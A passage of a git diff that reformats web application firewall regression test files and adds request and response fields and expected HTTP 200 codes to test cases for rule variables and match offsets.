a/test/test-cases/regression/misc-variable-under-quotes.json b/test/test-cases/regression/misc-variable-under-quotes.json index c455b69dec..865f1f3b04 100644 --- a/test/test-cases/regression/misc-variable-under-quotes.json +++ b/test/test-cases/regression/misc-variable-under-quotes.json @@ -1,79 +1,86 @@ -[ - { - "enabled":1, - "version_min":300000, - "title":"Testing Variables (quoted) :: REQUEST_LINE - contains (1/2)", - "client":{ - "ip":"200.249.12.31", - "port":123 +[ + { + "enabled": 1, + "version_min": 300000, + "title": "Testing Variables (quoted) :: REQUEST_LINE - contains (1/2)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"t:lowercase:" + "expected": { + "debug_log": "t:lowercase:", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRule \"REQUEST_LINE\" \"@contains index.php/admin/cms/wysiwyg/directive/\" \"id:1,phase:1,t:lowercase,ctl:auditLogParts=+E\"" ] }, - { - "enabled":1, - "version_min":300000, - "title":"Testing Variables (quoted) :: REQUEST_LINE - regex (2/2)", - "client":{ - "ip":"200.249.12.31", - "port":123 + { + "enabled": 1, + "version_min": 300000, + "title": "Testing Variables (quoted) :: REQUEST_LINE - regex (2/2)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"t:lowercase:" + "expected": { + "debug_log": "t:lowercase:", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRule \"REQUEST_LINE\" \"index.php/admin/cms/wysiwyg/directive/\" \"id:1,t:lowercase,ctl:auditLogParts=+E\"" ] } ] - diff --git a/test/test-cases/regression/misc.json b/test/test-cases/regression/misc.json index f089459927..fd4507928b 100644 --- a/test/test-cases/regression/misc.json +++ b/test/test-cases/regression/misc.json @@ -1,15 +1,40 @@ [ { - "enabled":1, - "version_min":300000, - "version_max":0, - "title":"Testing action :: SecRule directives should be case insensitive", - "expected":{ - "audit_log":"", - "debug_log":"Executing operator \"Contains\" with param \"PHPSESSID\" against REQUEST_HEADERS.", - "error_log":"" + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing action :: SecRule directives should be case insensitive", + "client": { + "ip": "", + "port": 0 }, - "rules":[ + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + + }, + "uri": "", + "method": "", + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "debug_log": "Executing operator \"Contains\" with param \"PHPSESSID\" against REQUEST_HEADERS.", + "http_code": 200 + }, + "rules": [ "secruleengine On", "secrule REQUEST_HEADERS \"@contains PHPSESSID\" \"id:1,t:lowercase,t:none,msg:'This is a test, %{REQUEST_HEADERS:Accept}%'\"", "secrule TX \"@contains to_test\" \"id:2,t:lowercase,t:none\"" diff --git a/test/test-cases/regression/offset-variable.json b/test/test-cases/regression/offset-variable.json index b5c4ed99ff..d914958d20 100644 --- a/test/test-cases/regression/offset-variable.json +++ b/test/test-cases/regression/offset-variable.json @@ -1,990 +1,1316 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Variable offset - ARGS", - "request":{ - "headers":{ - "Host":"localhost", + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - ARGS", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Host": "localhost", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, - "uri":"/index.html?param1=value1¶m2=value1", - "method":"GET" + "uri": "/index.html?param1=value1¶m2=value1", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "error_log":"o0,3v23,6t:trim" + "expected": { + "error_log": "o0,3v23,6t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRule ARGS \"@rx val\" \"id:1,phase:2,pass,t:trim,msg:'ops'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable offset - ARGS_GET", - "request":{ - "headers":{ - "Host":"localhost", + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - ARGS_GET", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Host": "localhost", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, - "uri":"/index.html?param1=value1¶m2=value2", - "method":"GET" + "uri": "/index.html?param1=value1¶m2=value2", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "error_log":"o3,3v37,6t:trim" + "expected": { + "error_log": "o3,3v37,6t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRule ARGS_GET \"@rx ue2\" \"id:1,phase:2,pass,t:trim,msg:'ops'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable offset - ARGS_POST 1", - "request":{ - "headers":{ - "Host":"localhost", + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - ARGS_POST 1", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Host": "localhost", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, - "uri":"/index.html?param1=value1¶m2=value1", - "method":"POST", - "body":[ + "uri": "/index.html?param1=value1¶m2=value1", + "method": "POST", + "body": [ "param1=value1¶m2=value1" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "error_log":"o3,3v142,6t:trim" + "expected": { + "error_log": "o3,3v142,6t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule ARGS_POST \"@rx ue1\" \"id:1,phase:2,pass,t:trim,msg:'ops'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable offset - ARGS_POST 2", - "request":{ - "headers":{ - "Host":"localhost", + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - ARGS_POST 2", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Host": "localhost", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, - "uri":"/index.html?param1=value1¶m2=value1", - "method":"POST", - "body":[ + "uri": "/index.html?param1=value1¶m2=value1", + "method": "POST", + "body": [ "param1=value1¶m2=value2¶m3=value3" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "error_log":"o3,3v156,6t:trim" + "expected": { + "error_log": "o3,3v156,6t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule ARGS_POST \"@rx ue2\" \"id:1,phase:2,pass,t:trim,msg:'ops'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable offset - ARGS_GET_NAMES 1", - "request":{ - "headers":{ - "Host":"localhost", + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - ARGS_GET_NAMES 1", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Host": "localhost", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, - "uri":"/index.html?param1=value1¶m2=value1", - "method":"POST", - "body":[ + "uri": "/index.html?param1=value1¶m2=value1", + "method": "POST", + "body": [ "param1=value1¶m2=value2¶m3=value3" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "error_log":"o0,6v17,6t:trim" + "expected": { + "error_log": "o0,6v17,6t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule ARGS_GET_NAMES \"@rx param1\" \"id:1,phase:2,pass,t:trim,msg:'ops'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable offset - ARGS_GET_NAMES 2", - "request":{ - "headers":{ - "Host":"localhost", + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - ARGS_GET_NAMES 2", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Host": "localhost", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, - "uri":"/index.html?param1=value1¶m2=value1", - "method":"POST", - "body":[ + "uri": "/index.html?param1=value1¶m2=value1", + "method": "POST", + "body": [ "param1=value1¶m2=value2¶m3=value3" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "error_log":"o0,6v31,6t:trim" + "expected": { + "error_log": "o0,6v31,6t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule ARGS_GET_NAMES \"@rx param2\" \"id:1,phase:2,pass,t:trim,msg:'ops'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable offset - ARGS_GET_NAMES 3", - "request":{ - "headers":{ - "Host":"localhost", + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - ARGS_GET_NAMES 3", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Host": "localhost", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, - "uri":"/index.html?param1=value1¶m2=value1", - "method":"POST", - "body":[ + "uri": "/index.html?param1=value1¶m2=value1", + "method": "POST", + "body": [ "param1=value1¶m2=value2¶m3=value3" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ + "expected": { + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule ARGS_GET_NAMES \"@rx am1 par\" \"id:1,phase:2,pass,t:trim,msg:'ops'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable offset - ARGS_GET_NAMES 4", - "request":{ - "headers":{ - "Host":"localhost", + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - ARGS_GET_NAMES 4", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Host": "localhost", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, - "uri":"/index.html?param1=value1¶m2=value1¶m3=value1", - "method":"POST", - "body":[ + "uri": "/index.html?param1=value1¶m2=value1¶m3=value1", + "method": "POST", + "body": [ "param1=value1¶m2=value2¶m3=value3" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ + "expected": { + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule ARGS_GET_NAMES \"@rx am1 param2 par\" \"id:1,phase:2,pass,t:trim,msg:'ops'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable offset - ARGS_POST_NAMES", - "request":{ - "headers":{ - "Host":"localhost", + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - ARGS_POST_NAMES", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Host": "localhost", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, - "uri":"/index.html?param1=value1¶m2=value1¶m3=value1", - "method":"POST", - "body":[ + "uri": "/index.html?param1=value1¶m2=value1¶m3=value1", + "method": "POST", + "body": [ "param1=value1¶m2=value2¶m3=value3" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "error_log": "0,6v149,6t:trim" + "expected": { + "error_log": "0,6v149,6t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule ARGS_POST_NAMES \"@rx param1\" \"id:1,phase:2,pass,t:trim,msg:'ops'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable offset - ARGS_NAMES", - "request":{ - "headers":{ - "Host":"localhost", + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - ARGS_NAMES", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Host": "localhost", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, - "uri":"/index.html?param1=value1¶m2=value1¶m3=value1", - "method":"POST", - "body":[ + "uri": "/index.html?param1=value1¶m2=value1¶m3=value1", + "method": "POST", + "body": [ "param1=value1¶m2=value2¶m3=value3" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "error_log":"o0,6v17,6t:trim" + "expected": { + "error_log": "o0,6v17,6t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule ARGS_NAMES \"@rx param1\" \"id:1,phase:2,pass,t:trim,msg:'ops'\"" ] }, - { - "enabled":1, - "version_min":300000, - "title":"Variable offset - ARGS_COMBINED_SIZE 1", - "request":{ - "headers":{ - "Host":"localhost", + { + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - ARGS_COMBINED_SIZE 1", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Host": "localhost", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, - "uri":"/index.html?param1=value1¶m2=value1¶m3=value1", - "method":"GET" + "uri": "/index.html?param1=value1¶m2=value1¶m3=value1", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "error_log":"v16,6v23,6v30,6v37,6v44,6v51,6t:trim" + "expected": { + "error_log": "v16,6v23,6v30,6v37,6v44,6v51,6t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule ARGS_COMBINED_SIZE \"@gt 1\" \"id:1,phase:2,pass,t:trim,msg:'ops'\"" ] - }, - { - "enabled":1, - "version_min":300000, - "title":"Variable offset - ARGS_COMBINED_SIZE 2", - "request":{ - "headers":{ - "Host":"localhost", + }, + { + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - ARGS_COMBINED_SIZE 2", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Host": "localhost", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, - "uri":"/index.html?param1=value1¶m2=value1¶m3=value1", - "method":"GET" + "uri": "/index.html?param1=value1¶m2=value1¶m3=value1", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "error_log":"v16,6v23,6v30,6v37,6v44,6v51,6t:trim" + "expected": { + "error_log": "v16,6v23,6v30,6v37,6v44,6v51,6t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule ARGS_COMBINED_SIZE \"@gt 1\" \"id:1,phase:2,pass,t:trim,msg:'ops'\"" ] }, - { - "enabled":1, - "version_min":300000, - "title":"Variable offset - REQUEST_LINE", - "request":{ - "headers":{ - "Host":"localhost", + { + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - REQUEST_LINE", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Host": "localhost", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded", "AuThOrIzAtIoN": "Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==" }, - "uri":"/index.html?param1=value1¶m2=value1¶m3=value1", - "method":"GET" + "uri": "/index.html?param1=value1¶m2=value1¶m3=value1", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "error_log":"o23,6v0,63t:trim" + "expected": { + "error_log": "o23,6v0,63t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule REQUEST_LINE \"value1\" \"id:1,phase:2,pass,t:trim,msg:'ops'\"" ] }, - { - "enabled":1, - "version_min":300000, - "title":"Variable offset - REQUEST_METHOD", - "request":{ - "headers":{ - "Host":"localhost", + { + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - REQUEST_METHOD", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Host": "localhost", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded", "AuThOrIzAtIoN": "Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==" }, - "uri":"/index.html?param1=value1¶m2=value1¶m3=value1", - "method":"GET", - "http_version": 1.1 + "uri": "/index.html?param1=value1¶m2=value1¶m3=value1", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "error_log":"o0,3v0,3t:trim" + "expected": { + "error_log": "o0,3v0,3t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule REQUEST_METHOD \"GET\" \"id:1,phase:2,pass,t:trim,msg:'ops'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable offset - REQUEST_PROTOCOL", - "request":{ - "headers":{ - "Host":"localhost", + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - REQUEST_PROTOCOL", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Host": "localhost", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded", "AuThOrIzAtIoN": "Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==" }, - "uri":"/index.html?param1=value1¶m2=value1¶m3=value1", - "method":"GET", - "http_version": 1.1 + "uri": "/index.html?param1=value1¶m2=value1¶m3=value1", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "error_log":"o5,3v58,8t:trim" + "expected": { + "error_log": "o5,3v58,8t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule REQUEST_PROTOCOL \"1.1\" \"id:1,phase:2,pass,t:trim,msg:'ops'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable offset - PATH_INFO", - "request":{ - "headers":{ - "Host":"localhost", + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - PATH_INFO", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Host": "localhost", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded", "AuThOrIzAtIoN": "Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==" }, - "uri":"/index.html?param1=value1¶m2=value1¶m3=value1", - "method":"GET", - "http_version": 1.1 + "uri": "/index.html?param1=value1¶m2=value1¶m3=value1", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "error_log":"o1,5v4,11t:trim" + "expected": { + "error_log": "o1,5v4,11t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule PATH_INFO \"index\" \"id:1,phase:2,pass,t:trim,msg:'ops'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable offset - QUERY_STRING", - "request":{ - "headers":{ - "Host":"localhost", + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - QUERY_STRING", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Host": "localhost", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded", "AuThOrIzAtIoN": "Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==" }, - "uri":"/index.html?param1=value1¶m2=value1¶m3=value1", - "method":"GET", - "http_version": 1.1 + "uri": "/index.html?param1=value1¶m2=value1¶m3=value1", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "error_log":"o7,6v16,41t:trim" + "expected": { + "error_log": "o7,6v16,41t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule QUERY_STRING \"value1\" \"id:1,phase:2,pass,t:trim,msg:'ops'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable offset - REQUEST_BASENAME", - "request":{ - "headers":{ - "Host":"localhost", + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - REQUEST_BASENAME", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Host": "localhost", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded", "AuThOrIzAtIoN": "Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==" }, - "uri":"/index.html?param1=value1¶m2=value1¶m3=value1", - "method":"GET", - "http_version": 1.1 + "uri": "/index.html?param1=value1¶m2=value1¶m3=value1", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "error_log":"o6,4v5,10t:trim" + "expected": { + "error_log": "o6,4v5,10t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule REQUEST_BASENAME \"html\" \"id:1,phase:2,pass,t:trim,msg:'ops'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable offset - REQUEST_URI", - "request":{ - "headers":{ - "Host":"localhost", + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - REQUEST_URI", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Host": "localhost", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded", "AuThOrIzAtIoN": "Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==" }, - "uri":"/index.html%20%20?param1=value1¶m2=value1¶m3=value1", - "method":"GET", - "http_version": 1.1 + "uri": "/index.html%20%20?param1=value1¶m2=value1¶m3=value1", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "error_log":"o7,4v4,59t:trim" + "expected": { + "error_log": "o7,4v4,59t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule REQUEST_URI \"html\" \"id:1,phase:2,pass,t:trim,msg:'ops'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable offset - REQUEST_URI_RAW", - "request":{ - "headers":{ - "Host":"localhost", + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - REQUEST_URI_RAW", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Host": "localhost", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded", "AuThOrIzAtIoN": "Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==" }, - "uri":"/index.html%20%20?param1=value1¶m2=value1¶m3=value1", - "method":"GET", - "http_version": 1.1 + "uri": "/index.html%20%20?param1=value1¶m2=value1¶m3=value1", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "error_log":"o7,4v4,59t:trim" + "expected": { + "error_log": "o7,4v4,59t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule REQUEST_URI_RAW \"html\" \"id:1,phase:2,pass,t:trim,msg:'ops'\"" ] }, - - { - "enabled":1, - "version_min":300000, - "title":"Variable offset - REQUEST_HEADERS", - "request":{ - "headers":{ + { + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - REQUEST_HEADERS", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { "Content-Length": "27", - "Host":"localhost", + "Host": "localhost", "AuThOrIzAtIoN": "Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==", "Content-Type": "application/x-www-form-urlencoded" }, - "uri":"/index.html?param1=value1¶m2=value1¶m3=value1", - "method":"GET" + "uri": "/index.html?param1=value1¶m2=value1¶m3=value1", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "error_log":"o0,9v89,9t:trim" + "expected": { + 